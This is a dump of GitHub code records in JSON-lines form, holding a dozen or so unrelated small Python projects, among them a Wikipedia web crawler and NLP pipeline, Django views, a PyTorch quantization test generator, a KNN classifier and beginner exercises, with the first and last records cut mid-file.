os.path.exists(file_path):\n return True\n\n if info[\"size\"] != len(corpus):\n return True\n\n \n\n \n if len(corpus) < config[\"alwaysRebuildIndexIfSmallerThan\"]:\n return True \n\n #if the decks used when building the index the last time differ from the decks used now, rebuild\n if len(config[\"decks\"]) != len(info[\"decks\"]):\n return True\n\n for d in config[\"decks\"]:\n if d not in info[\"decks\"]:\n return True\n \n\n #if the excluded fields when building the index the last time differ from the excluded fields now, rebuild\n if len(config[\"fieldsToExclude\"]) != len(info[\"fieldsToExclude\"]):\n return True\n\n for model_name, field_list in config[\"fieldsToExclude\"].items():\n if model_name not in info[\"fieldsToExclude\"]:\n return True\n if len(field_list) != len(info[\"fieldsToExclude\"][model_name]):\n return True\n for field_name in field_list:\n if field_name not in info[\"fieldsToExclude\"][model_name]:\n return True\n \n if len(set(config[\"stopwords\"])) != info[\"stopwordsSize\"]:\n return True\n\n return False\n\n\nclass ProcessRunnable(QRunnable):\n \"\"\"\n Only used to build the index in background atm.\n \"\"\"\n def __init__(self, target, *args):\n QRunnable.__init__(self)\n self.t = target\n self.args = args\n self.after_end = None\n\n def run(self):\n self.t(*self.args)\n if self.after_end is not None:\n self.after_end()\n\n def start(self):\n QThreadPool.globalInstance().start(self)\n\n","repo_name":"glutanimate/anki-search-inside-add-card","sub_path":"indexing.py","file_name":"indexing.py","file_ext":"py","file_size_in_byte":7063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"74686388639","text":"import random\nfrom statistics import median\n\nliczba_elementow=int(input(\"Ile elementow ma zawierac tablica? \"))\nlist = []\n\nwhile True:\n decyzja = input(\"Czy liczby maja byc losowe [tak/nie]? \")\n if decyzja.lower()==\"tak\":\n najmniejsza = int(input(\"Podaj najmnniejsza liczbe, ktora moze byc wylosowana: \"))\n najwieksza = int(input(\"Podaj najwieksza liczbe, ktora moze byc wylosowana: \"))\n for i in range (liczba_elementow):\n list.append(random.randrange(najmniejsza, najwieksza))\n break\n elif decyzja.lower()==\"nie\":\n for i in range (liczba_elementow):\n list.append(int(input(f\"Wprowadz {i+1} element tablicy: \")))\n break\n\nprint(f\"Lista: {list}\")\nprint(f\"Posortowana lista: {sorted(list)}\")\nprint(f\"Lista sklada sie z : {len(list)} elementow\")\nprint(f\"Suma elementów listy wynosi: {sum(list)} \")\nprint(f\"Największy element listy ma wartosc: {max(list)} \")\nprint(f\"Najmniejszy element listy ma wartosc: {min(list)} \")\nprint(f\"Średnia wszystkich wartości z listy wynosi: {sum(list)/len(list)}\")\nprint(f\"Mediana wszystkich wartośći z listy wynosi: {median(list)} \")","repo_name":"Kebsiula2007/Klasa-2","sub_path":"zajecia 2/listy.py","file_name":"listy.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3818093046","text":"# Chris Straschewski\r\n# CMS180014\r\n# CS 4395.001\r\n\r\n# Web Crawler\r\n\r\n## Build a web crawler function that starts with a URL representing a topic\r\n# and outputs a list of at least 15 relevant URLs. 
The URLs can be pages within\r\n# the original domain but should have a few outside the original domain.\r\n\r\n# First we need a starter URL\r\nstarting_url = \"https://en.wikipedia.org/wiki/Shrek\"\r\n\r\n# Import soup and requests\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\n\r\n# Function that will loop through and save urls from the website\r\ndef url_looper(url):\r\n\r\n # get requests from starting url\r\n req = requests.get(url)\r\n\r\n # put the requests into text\r\n data = req.text\r\n\r\n # create a soup object with this text\r\n soup = BeautifulSoup(data, features=\"html.parser\")\r\n\r\n # initialize counter\r\n counter = 0\r\n\r\n # write urls to a file to be read after\r\n with open('urls.txt', 'w') as f:\r\n for link in soup.find_all('a'):\r\n #print(link('href'))\r\n f.write(str(link.get('href')) + '\\n\\n')\r\n if counter > 20:\r\n break\r\n counter += 1\r\n\r\n #print(\"end of crawler\")\r\n\r\nurl_looper(starting_url)\r\n\r\n# Function that will loop through urls again but narrow down what gets saved\r\ndef url_looper2(url):\r\n\r\n req = requests.get(url)\r\n\r\n data = req.text\r\n\r\n soup = BeautifulSoup(data, features=\"html.parser\")\r\n\r\n counter = 0\r\n\r\n with open('urls2.txt', 'w') as f:\r\n for link in soup.find_all('a'):\r\n link_str = str(link.get('href'))\r\n if 'Shrek' in link_str or 'shrek' in link_str:\r\n if link_str.startswith('/url?q='):\r\n link_str = link_str[7:]\r\n print('MOD:', link_str)\r\n if '&' in link_str:\r\n i = link_str.find('&')\r\n link_str = link_str[:i]\r\n if link_str.startswith('http') and 'google' not in link_str:\r\n if 'wikipedia' in link_str:\r\n if 'en.wikipedia' in link_str and counter < 15:\r\n f.write(link_str + '\\n')\r\n counter += 1\r\n else:\r\n if 'https://www.the-numbers.com/movie/Shrek' not in link_str and \\\r\n 'https://web.archive.org' not in link_str and \\\r\n 'telegraph.co' not in link_str and \\\r\n 'nytimes' not in link_str and \\\r\n 'yahoo' not in link_str and \\\r\n 'digitalmediafx' not in link_str and \\\r\n 'nicolas-cage' not in link_str and \\\r\n 'jimhillmedia' not in link_str and \\\r\n counter < 15:\r\n\r\n f.write(link_str + '\\n')\r\n counter += 1\r\n\r\n\r\n #print(\"end of crawler\")\r\n\r\nurl_looper2(starting_url)\r\n\r\n# Good links\r\n# 1 https://commons.wikimedia.org/wiki/Category:Shrek_(2001_film)\r\n# 2 https://en.wikiquote.org/wiki/Shrek\r\n# 3 https://variety.com/2001/film/awards/shrek-3-1200468574/\r\n# 4 https://variety.com/2001/scene/vpage/shrek-shleps-in-1117797904/\r\n# 5 https://ew.com/article/2001/05/29/shrek-anti-disney-fairy-tale/\r\n# 6 https://www.vulture.com/2020/12/national-film-registry-2020-dark-knight-grease-and-shrek.html\r\n# 7 http://culture.com/articles/487/shrek-interview-with-mike-myers.phtml\r\n# 8 http://cinema.com/articles/462/shrek-production-notes.phtml\r\n# 9 https://www.indiewire.com/2010/04/dreamworks-tell-all-exposes-katzenberg-shrek-bail-out-238761/\r\n# 10 http://shardlowart.blogspot.com/2010/05/shreks-house-early-concepts.html\r\n# 11 http://culture.com/articles/463/shrek-production-information.phtml\r\n# 12 https://usatoday30.usatoday.com/life/enter/movies/2001-05-18-shrek-more-characters.htm\r\n# 13 https://www.cnn.com/2015/08/06/entertainment/chris-farley-shrek-voice-feat/\r\n# 14 https://www.cbr.com/movie-legends-revealed-myers-minor-change-cost-shrek-4m/\r\n# 15 https://www.thefreelibrary.com/Shrek's+appeal%3B+WHY+MYERS'+OGRE+JUST+HAD+TO+HAVE+SCOTS+ACCENT.-a0117830257\r\n\r\n\r\n# Look at URLs that got saved\r\n#with open('urls2.txt', 
'r') as f:\r\n #urls2 = f.read().splitlines()\r\n #print('\\nSaved URLs:')\r\n#for i in urls2:\r\n #print(i)\r\n\r\n\r\n## Write a function to loop through your URLs and scrape all text off each page.\r\n## Store each page’s text in its own file.\r\n\r\n# function to determine if an element is visible (skips non-content tags and HTML comments)\r\ndef visible(element):\r\n if element.parent.name in ['style', 'script', '[document]', 'head', 'title']:\r\n return False\r\n elif re.match('<!--.*-->', str(element.encode('utf-8'))):\r\n return False\r\n return True\r\n\r\nimport urllib.request\r\nfrom urllib.request import urlopen, Request\r\nimport re\r\n\r\n# function that gets text from the 15 chosen urls\r\ndef url_text(url):\r\n\r\n html = urllib.request.urlopen(url)\r\n soup = BeautifulSoup(html, features=\"html.parser\")\r\n data = soup.findAll(text=True)\r\n result = filter(visible, data)\r\n temp_list = list(result) # list from filter\r\n temp_str = ' '.join(temp_list)\r\n return temp_str\r\n\r\n# run above function with our text file full of 15 relevant urls\r\n# and put output into 15 text files\r\ncounter = 1\r\n\r\nwith open('urls2.txt', 'r') as f:\r\n urls = f.read().splitlines()\r\nfor i in urls:\r\n with open('url_text_' + str(counter) + '.txt', 'w', encoding=\"utf-8\") as f:\r\n f.write(url_text(i))\r\n counter += 1\r\n\r\n## Write a function to clean up the text from each file. You might need to delete newlines\r\n## and tabs first. Extract sentences with NLTK’s sentence tokenizer. Write the sentences for\r\n## each file to a new file. That is, if you have 15 files in, you have 15 files out.\r\nimport nltk\r\nfrom nltk import sent_tokenize\r\n\r\n\r\ndef clean_text(filename, counter):\r\n\r\n # open passed file for text processing\r\n with open(filename, 'r', encoding=\"utf-8\") as f:\r\n # read raw text and store it into a variable\r\n raw_text = f.read()\r\n\r\n # remove tabs and newlines\r\n raw_text = raw_text.replace('\\n', ' ')\r\n raw_text = raw_text.replace('\\t', ' ')\r\n\r\n # encoding the text to ASCII format\r\n text = raw_text.encode(encoding=\"ascii\", errors=\"ignore\")\r\n # decoding the text\r\n text = text.decode()\r\n # remove semicolons\r\n text = text.replace(';', ' ')\r\n # remove various other symbols\r\n text = text.replace('_', ' ')\r\n text = text.replace('|', ' ')\r\n text = text.replace('/', ' ')\r\n text = text.replace('<', ' ')\r\n text = text.replace('>', ' ')\r\n text = text.replace('\\\\', ' ')\r\n text = text.replace('/', ' ')\r\n text = text.replace('@', ' ')\r\n # cleaning the text to remove extra whitespace\r\n text = \" \".join([word for word in text.split()])\r\n\r\n # lowercase all text\r\n text = text.lower()\r\n\r\n # done with text cleaning\r\n sentences = sent_tokenize(text)\r\n\r\n # create file for output\r\n with open('url_sentences_'+str(counter)+'.txt', 'w', encoding=\"utf-8\") as f:\r\n # for loop to iterate through sentences and print them into file\r\n for sentence in sentences:\r\n f.write(sentence)\r\n\r\n# For loop to send all 15 files into text cleaner and get the 15 sentence files\r\nfor i in range(1, 16):\r\n clean_text('url_text_'+str(i)+'.txt', i)\r\n\r\n## Write a function to extract at least 25 important terms from the pages using an\r\n## importance measure such as term frequency, or tf-idf. First, it’s a good idea to\r\n## lowercase everything, remove stopwords and punctuation. 
Print the top 25-40 terms\r\nfrom nltk.corpus import stopwords\r\ndef important_terms():\r\n\r\n # we will need a dict that counts word frequency\r\n word_frequency_dict = {}\r\n\r\n # open all 15 files one by one\r\n for i in range(1,16):\r\n with open('url_sentences_'+str(i)+'.txt', 'r', encoding=\"utf-8\") as f:\r\n text = f.read()\r\n # tokenize text\r\n tokens = nltk.word_tokenize(text)\r\n\r\n tokens = [t for t in tokens if t.isalpha() and # only alpha, remove punctuation\r\n t not in stopwords.words('english')] # remove stopwords\r\n\r\n for token in tokens:\r\n if token in word_frequency_dict:\r\n word_frequency_dict[token] += 1\r\n else:\r\n word_frequency_dict[token] = 1\r\n\r\n # sort the dict by count and print the 40 most common words and their counts\r\n sorted_word_freq_dict = dict(sorted(word_frequency_dict.items(), key=lambda x: x[1], reverse=True))\r\n important_words = dict(list(sorted_word_freq_dict.items())[0: 40])\r\n\r\n print(\"\\n40 Most Common Words:\", important_words)\r\n\r\n # Removing some unimportant words\r\n del important_words['end']\r\n del important_words['plus']\r\n del important_words['ad']\r\n del important_words['tv']\r\n del important_words['video']\r\n del important_words['tag']\r\n del important_words['account']\r\n del important_words['print']\r\n del important_words['subscribe']\r\n del important_words['zone']\r\n del important_words['menu']\r\n del important_words['get']\r\n del important_words['news']\r\n del important_words['content']\r\n del important_words['privacy']\r\n\r\n print(\"\\nMost Common Words:\", important_words)\r\n\r\n return important_words\r\n\r\n # from here I'll manually select the 10 most important terms in no particular order\r\n # character (shrek, donkey, fiona, farquaad)\r\n # film (movie)\r\n # myers\r\n # awards\r\n # animated\r\n # like\r\n # see\r\n # variety\r\n # icon\r\n\r\nimportant_terms()\r\n\r\n\r\n## Build a knowledge base\r\n# Dict with sentences straight from the files +\r\n# Dict with our most important terms\r\n# ^ Both would be useful for a chatbot, these could be combined later\r\n\r\n# Dict with sentences from the files\r\nsent_dict = {}\r\nfor i in range(1,16):\r\n with open('url_sentences_'+str(i)+'.txt', 'r', encoding='utf-8') as f:\r\n text = f.read()\r\n sentences = sent_tokenize(text)\r\n for sentence in sentences:\r\n if sentence in sent_dict:\r\n sent_dict[sentence] += 1\r\n else:\r\n sent_dict[sentence] = 1\r\n\r\nprint(sent_dict)\r\n\r\n# Dict with best words was already made earlier, we will now pickle both dicts\r\nimport pickle\r\n\r\nimportant_words = important_terms()\r\n\r\npickle.dump(sent_dict, open('sent_dict.p', 'wb'))\r\npickle.dump(important_words, open('important_dict.p', 'wb'))\r\n\r\nsent_dict = pickle.load(open('sent_dict.p', 'rb'))\r\nprint('\\n', sent_dict)\r\n\r\nimportant_dict = pickle.load(open('important_dict.p', 'rb'))\r\nprint('\\n', important_dict)","repo_name":"chris-straschewski/NLP","sub_path":"WC.py","file_name":"WC.py","file_ext":"py","file_size_in_byte":10655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73740306398","text":"import math\r\n\r\nX = int(input())\r\nY = float(input())\r\nZ = int(input())\r\nworkers = int(input())\r\nfor_wine = X * 0.4\r\ngrapes_for_wine = for_wine * Y\r\nliters_wine = grapes_for_wine / 2.5\r\nresult = liters_wine - Z\r\nif Z > liters_wine:\r\n print(f'It will be a tough winter! 
More {math.floor(abs(result))} liters wine needed.')\r\nelse:\r\n print(f'Good harvest this year! Total wine: {math.floor(liters_wine)} liters.')\r\n print(f'{math.ceil(result)} liters left -> {math.ceil(result / workers)} liters per person.')\r\n","repo_name":"DilyanTsenkov/SoftUni-Software-Engineering","sub_path":"Programming Basics with Python/02 Conditional statements/More exercises/03_Harvest.py","file_name":"03_Harvest.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"24040926696","text":"# Import the Post model (board posts) into the view\nfrom .models import Post\nfrom django.shortcuts import render, get_object_or_404, redirect\n\n# Create your views here.\ndef index(request):\n return render(request,'my_pet/index.html')\n\n# my_pet: the view function that renders the my_pet.html page\ndef my_pet(request):\n # Fetch all Posts and store them in postlist\n postlist = Post.objects.all()\n # When opening my_pet.html, also pass postlist containing every Post\n return render(request, 'my_pet/my_pet.html', {'postlist': postlist})\n\n# posting: the view function that renders a single my_pet post\ndef posting(request, post_id):\n # Look up one post among the Posts using its pk (primary key)\n post = get_object_or_404(Post, pk=post_id)\n # When opening posting.html, pass the found post under the name post\n return render(request, 'my_pet/posting.html', {'post': post})\n\ndef new_post(request):\n if request.method =='POST':\n new_article=Post.objects.create(\n postname=request.POST['postname'],\n contents=request.POST['contents'],\n petimage=request.FILES['petimage'],\n )\n return redirect('/my_pet/')\n return render(request, 'my_pet/new_post.html')\n\ndef delete_post(request, post_id):\n post = Post.objects.get(pk = post_id)\n if request.method == 'POST':\n post.delete()\n return redirect('/my_pet/')\n return render(request, 'my_pet/remove_post.html', {'post':post})\n\ndef update_post(request, post_id):\n post = Post.objects.get(pk = post_id)\n if request.method =='POST':\n post.postname = request.POST['postname']\n post.contents = request.POST['contents']\n post.petimage = request.FILES['petimage']\n post.save()\n return redirect('/my_pet/')\n return render(request, 'my_pet/update_post.html', {'post':post})","repo_name":"ChoiWonOong/Django_myPet","sub_path":"my_pet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38103450500","text":"from src.experiments import (\n bargaining_gap_experiment as bg_ig,\n compare_guarantees_experiment as cg_ig,\n total_surplus_experiment as ts_ig\n)\nfrom src.experiments.additive_utility_goods import (\n bargaining_gap_experiment as gb_au,\n total_surplus_experiment as ts_au\n)\n\n\nEXP_NUMBER = 1000\n\n\ndef run():\n experiments = [\n cg_ig.CompareGuaranteeExperiment(),\n bg_ig.BargainingGapExperiment(),\n bg_ig.BargainingGapMixedUtilitiesExperiment(),\n ts_ig.TotalSurplusExperiment(),\n gb_au.BargainingGapExperiment(),\n ts_au.TotalSurplusExperiment()\n ]\n\n for exp in experiments:\n print(f'run {exp}')\n exp.run_and_save(EXP_NUMBER)\n print(f'{exp} done!')\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"AdayevKP/fair_division_with_money","sub_path":"gen_data.py","file_name":"gen_data.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73547012318","text":"import cv2\r\nfrom scipy import ndimage\r\nimport scipy.misc\r\nimport numpy as 
np\nimport torch\nimport os\nimport json\nfrom math import *\nimport h5py\nimport matplotlib.pyplot as plt\n\nfrom ddqn_LWF.model_new import reinforcement_net_new\nfrom ddqn_LWF.utils_new import plot_figures, preprocessing, postProcessing\nimport warnings \nwarnings.filterwarnings(\"ignore\") \n\nnet = reinforcement_net_new(use_cuda=True)\n\nmodel_name = 'weight/behavior_LWF_10_1500_0.00.pth'\nnet.load_state_dict(torch.load(model_name))\n# net.grasp_net.load_state_dict(torch.load('weight/grasp_net.pth'))\n# net.value_net.load_state_dict(torch.load('weight/value_net.pth'))\nnet = net.cuda().eval()\n\n# torch.save(net.grasp_net.state_dict(), os.path.join(\n# '/home/austin/Grasp_DRL_2/weight', \"grasp_net.pth\"))\n\n# torch.save(net.value_net.state_dict(), os.path.join(\n# '/home/austin/Grasp_DRL_2/weight', \"value_net.pth\"))\n\n\nL = os.listdir('/home/austin/Test_ws/src/collect/src/Datasets_view')\n# L.sort()\n# print(L)\nup = [0,0]\nfr = [0,0]\nx = []\ny = []\nfor name in L:\n# for name in L[:1]:\n# for name in L[345:355]:\n # print(name)\n print(100*(up[1]+fr[1])/len(L), end='\\r')\n num = int(name.split('_')[1])\n A = os.listdir('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/rgb')\n A.sort()\n B = os.listdir('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/depth')\n B.sort()\n # print(B)\n # print(A)\n\n \n\n color = cv2.imread('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/rgb/'+A[0])\n # print(color.shape)\n color = cv2.resize(color, (224,224))\n depth = np.load('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/depth/'+B[0])\n depth[depth>10000] = 0\n\n\n color_tensor, depth_tensor, pad = preprocessing(color, depth)\n color_tensor = color_tensor.cuda()\n depth_tensor = depth_tensor.cuda()\n\n with torch.no_grad():\n prediction, prediction_new = net.forward(color_tensor, depth_tensor, is_volatile=True)\n\n _,_,aff, out, view = postProcessing(prediction, prediction_new, color, depth, color_tensor, pad, show=False)\n # print(view.shape)\n id = np.where(view == np.max(view))\n cv2.circle(view, (id[1][0], id[0][0]), 3, (0, 0, 0), 2)\n # print(id[1][0])\n x.append(id[0][0])\n y.append(id[1][0])\n with open('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/rgb/'+A[1],\"r\") as F:\n data = json.load(F)\n if data['shapes'][0]['label'] == 'upper':\n if num < 350:\n up[1] += 1\n if id[1][0] < 112:\n up[0] += 1\n else:\n fr[1] += 1\n if id[1][0] > 112:\n fr[0] += 1\n\n else:\n if num < 350:\n fr[1] += 1\n if id[1][0] > 112:\n fr[0] += 1\n else:\n up[1] += 1\n if id[1][0] < 112:\n up[0] += 1\n\n # fig = plt.figure(figsize=(10, 10))\n # fig.add_subplot(1, 3, 1)\n # plt.imshow(color[:,:,[2,1,0]])\n\n # fig.add_subplot(1, 3, 2)\n # plt.imshow(aff[:,:,[2,1,0]])\n # # plt.imshow(out[0][0])\n\n # fig.add_subplot(1, 3, 3)\n # plt.imshow(view)\n\n # plt.show()\n\n # os.mkdir('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/Qmap')\n # np.save('/home/austin/Test_ws/src/collect/src/Datasets_view/'+name+'/Qmap/qmap', out[0][0])\n # norm = np.linalg.norm(out[0][0])\n # out[0][0] = out[0][0]/norm\n # print(out[0][0])\n # plt.imshow(out[0][0])\n\n # plt.show()\nprint(up[0]/up[1])\n# print(up[0],up[1])\nprint(fr[0]/fr[1])\nplt.scatter(y, x)\n# plt.savefig('V6_1000.png', dpi=300)\nplt.show()\n\n#IfiveOO\n# vtwo0.17624521072796934\n# 0.7782426778242678\n# vthree0.29118773946360155\n# 0.7280334728033473\n# vfour0.20306513409961685\n# 0.8326359832635983\n# vfive0.5977011494252874\n# 
0.4225941422594142","repo_name":"austin2408/Grasp_DRL_2","sub_path":"ddqn_evaluation_LWF.py","file_name":"ddqn_evaluation_LWF.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5612142935","text":"import torch\nfrom torch import Tensor\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom typing import Union, List\n\nfrom .genesys_qmodels import dram_layout, shuffle_weights\n\nclass QLayer(nn.Module):\n def __init__(self, layer: str, input_width: Union[int, List] = None, output_width: Union[int, List] = None,\n method: str = 'truncate', **kwargs):\n super(QLayer, self).__init__()\n self.input_width = input_width\n self.output_width = output_width\n self.method = method\n assert method == 'truncate' or method == 'scale'\n self.layer = getattr(nn, layer)(**kwargs)\n\n def forward_scaled(self, input: Tensor) -> Tensor:\n if self.input_width is not None:\n # quantize_per_tensor works only on float tensors\n qinput = torch.quantize_per_tensor(input.float(), self.input_width[0], self.input_width[1],\n self.input_width[2])\n output = self.layer.forward(qinput.dequantize())\n else:\n # Compute forward using floats since lot of torch operators don't have int support on CPUs\n output = self.layer.forward(input.float())\n if self.output_width is not None:\n qoutput = torch.quantize_per_tensor(output, self.output_width[0], self.output_width[1],\n self.output_width[2])\n return qoutput.dequantize()\n else:\n return output.int()\n\n def forward_truncate(self, input: Tensor) -> Tensor:\n if self.input_width is not None:\n input_mask = torch.ones(input.size()) * ((1 << self.input_width) - 1)\n qinput = torch.bitwise_and(input, input_mask.int())\n output = self.layer.forward(qinput.float()).int()\n else:\n # Compute forward using floats since lot of torch operators don't have int support on CPUs\n output = self.layer.forward(input.float()).int()\n if self.output_width is not None:\n output_mask = torch.ones(output.size()) * ((1 << self.output_width) - 1)\n qoutput = torch.bitwise_and(output, output_mask.int())\n return qoutput\n else:\n return output\n\n def forward(self, input: Tensor) -> Tensor:\n if self.method == 'truncate':\n return self.forward_truncate(input)\n else:\n return self.forward_scaled(input)\n\n @property\n def weight(self):\n return self.layer.weight\n\n @property\n def bias(self):\n return self.layer.bias\n\ndef gen_conv_testcase(input_dim, weight_dim, stride=1, padding=0, base_path=\".\", bias=False):\n # Input is (N, H, W, C)\n input = np.random.randint(low=0, high=127, size=input_dim, dtype=np.int8)\n # Weights is (KH, KW, OC, IC) layout\n weights = np.random.randint(low=0, high=127, size=weight_dim, dtype=np.int8)\n with open(f'{base_path}/input.txt', 'w') as f:\n f.write('\\n'.join(dram_layout(input)))\n with open(f'{base_path}/weights.txt', 'w') as f:\n f.write('\\n'.join(dram_layout(shuffle_weights(weights))))\n\n\n model = QLayer('Conv2d', in_channels=weight_dim[3], out_channels=weight_dim[2], kernel_size=weight_dim[0],\n stride=stride,\n padding=padding, bias=bias)\n input_tensor = torch.from_numpy(input)\n input_tensor = input_tensor.float()\n model.weight.data = torch.from_numpy(weights)\n model.weight.data = model.weight.data.float()\n # Reshape as Conv2D layer in pytorch needs input as (N,C,H,W)\n input_tensor = input_tensor.permute(0, 3, 1, 2)\n # Reshape as Conv2D layer in pytorch needs weight as (OC,IC,KH,KW)\n model.weight.data = 
model.weight.data.permute(2, 3, 0, 1)\n output = model(input_tensor)\n model.eval()\n # Output from pytorch is (N, OC, H, W)\n # Reshape output as Genesys will generate output as (N, H, W, OC)\n output = output.permute(0, 2, 3, 1).numpy()\n output = output.flatten().tolist()\n output = [str(x) for x in output]\n # Write outputs to file\n with open(f'{base_path}/output.txt', 'w') as f:\n f.write('\\n'.join(output))","repo_name":"VeriGOOD-ML/public","sub_path":"genesys/genesys/examples/genesys/genesys_pytorch_data.py","file_name":"genesys_pytorch_data.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"51"} +{"seq_id":"23389755710","text":"import random\r\n\r\npaises = [\"Czech\", \"Austria\", \"Germany\", \"Italy\", \"Spain\", \"France\", \"Belgium\", \"Romania\"]\r\nprecios = [1500, 3200, 3500, 2000, 2500, 3000, 2900, 1000]\r\n\r\nwhile True:\r\n try: \r\n budget = int(input(\"ingrese su budget: \"))\r\n break\r\n except ValueError:\r\n print(\"debe ingresar un presupuesto\")\r\n \r\ncountry = list(zip(paises,precios))\r\nviaje = list(filter(lambda x: x[1] <= budget,country))\r\n\r\nif viaje:\r\n choice = random.choice(viaje)\r\n print(f'con un presupuesto $ {budget: }, puede viajar a {choice[0]}')\r\nelse:\r\n print(f'con presupuesto de $ {budget: }, no hay destinos')\r\n ","repo_name":"AlGGB/travel_and_budget","sub_path":"travel_and_budget.py","file_name":"travel_and_budget.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19437828336","text":"# Задача 20:\n# В настольной игре Скрабл (Scrabble) каждая буква имеет определенную ценность.\n# В случае с английским алфавитом очки распределяются так:\n# A, E, I, O, U, L, N, S, T, R – 1 очко;\n# D, G – 2 очка;\n# B, C, M, P – 3 очка;\n# F, H, V, W, Y – 4 очка;\n# K – 5 очков;\n# J, X – 8 очков;\n# Q, Z – 10 очков.\n# А русские буквы оцениваются так:\n# А, В, Е, И, Н, О, Р, С, Т – 1 очко;\n# Д, К, Л, М, П, У – 2 очка;\n# Б, Г, Ё, Ь, Я – 3 очка;\n# Й, Ы – 4 очка;\n# Ж, З, Х, Ц, Ч – 5 очков;\n# Ш, Э, Ю – 8 очков;\n# Ф, Щ, Ъ – 10 очков.\n# Напишите программу, которая вычисляет стоимость введенного пользователем слова.\n# Будем считать, что на вход подается только одно слово, которое содержит либо только английские, либо только русские буквы.\n# Ввод: ноутбук\n# Вывод: 12\n\npoints = {1: 'aeioulnstrавеинорст',\n 2: 'dgдклмпу',\n 3: 'bcmpбгёья',\n 4: 'fhvwyйы',\n 5: 'kжзхцч',\n 8: 'jxшэю',\n 10: 'qzфщъ'}\nword = input('Введите слово: ')\nprint(sum([k for i in word for k, v in points.items() if i in v])) #цикл перебирает значения в списке word, второй цикл перебирает ключи и значения \n #словаря points с помощью метода items, и сравнивает их значения, складывая\n #ключи (k) в случае, если i == v","repo_name":"Modzhin35/pythonhw3","sub_path":"task20.py","file_name":"task20.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30190837024","text":"'''Exercício Python 044: Elabore um programa que calcule o valor a ser pago por um produto, considerando o seu preço normal e condição de pagamento:\n- à vista dinheiro/cheque: 10% de desconto\n- à vista no cartão: 5% de desconto\n- em até 2x no cartão: preço normal\n- 3x ou mais no cartão: 20% de juros'''\n\nprint('{:=^40}'.format(' LOJAS LAURITZ '))\nvalor = float(input('Digite o valor do 
produto:\\nR$'))\nprint('''FORMAS DE PAGAMENTO\n[ 1 ] à vista dinheiro/cheque\n[ 2 ] à vista no cartão\n[ 3 ] em até 2x no cartão\n[ 4 ] 3x ou mais no cartão''')\n\nopção = int(input('Qual é a opção? '))\n\nif opção == 1:\n print('O valor total do pagamento ficou de R${:.2f}'.format(valor - (valor * 0.1)))\nelif opção == 2:\n print('O valor total do pagamento ficou de R${:.2f}'.format(valor - (valor * 0.05)))\nelif opção == 3:\n parcela = valor / 2\n print('Sua compra será parcelada em 2x de R${:.2f}'.format(parcela))\n print('O valor total do pagamento ficou de R${:.2f}'.format(valor))\nelif opção == 4:\n totalP = int(input('Quantas parcelas? '))\n valor = valor + (valor * 0.2)\n parcela = valor / totalP\n print('Sua compra será parcelada em {}x de R${:.2f} COM JUROS'.format(totalP, parcela))\n print('O valor total do pagamento ficou de R${:.2f}'.format(valor))\nelse:\n valor = valor\n print('\\033[2;31mOpção inválida de pagamento. Tente novamente!')\n","repo_name":"RafaelTLauris/Estudos-Python","sub_path":"PythonExercicios/Exercicios/ex044-(Gerenciador de Pagamentos).py","file_name":"ex044-(Gerenciador de Pagamentos).py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72745859358","text":"import numpy as np\r\nimport pylab as pl\r\nimport pandas as pd\r\nimport math\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn import neighbors, datasets\r\nimport random\r\nfrom numpy.random import permutation\r\n\r\ndf = pd.read_csv(\"breast_cancer_full.csv\")\r\ndf.replace('?',-99999, inplace=True)\r\ndf.drop(['id'], 1, inplace=True)\r\n\r\nrandom_indices = permutation(df.index)\r\nmax_length = math.floor(len(df)/3)\r\n\r\ntest = df.loc[random_indices[1:max_length]]\r\ntrain = df.loc[random_indices[max_length:]]\r\n\r\nx_col = ['Thickness','Size','Shape','Adhesion','Epithelial','Nuclei','Chromatin','Nucleoli','Mitosis']\r\ny_col = ['Class']\r\n\r\nknn = KNeighborsRegressor(n_neighbors=3)\r\nknn.fit(train[x_col],train[y_col])\r\npredictions = knn.predict(test[x_col])\r\n\r\nactual_set = test[y_col]\r\n\r\nactual = np.asarray(actual_set)\r\n\r\ncorrect = 0\r\ntotal = 0\r\n\r\nfor i in range(len(predictions)):\r\n if(predictions[i] == actual[i]):\r\n correct += 1\r\n total += 1\r\n\r\nprint('Accuracy: ', correct/float(total))\r\n","repo_name":"willsyo/Machine-Learning","sub_path":"KNN/SklearnKnn.py","file_name":"SklearnKnn.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"31891341918","text":"\"\"\" \n The tic-tac-toe game board to play tic tac toe\n \n ----------\n Attributes\n ----------\n rows : int\n columns: int\n self.__board: numpy.ndarray obj\n self.color: 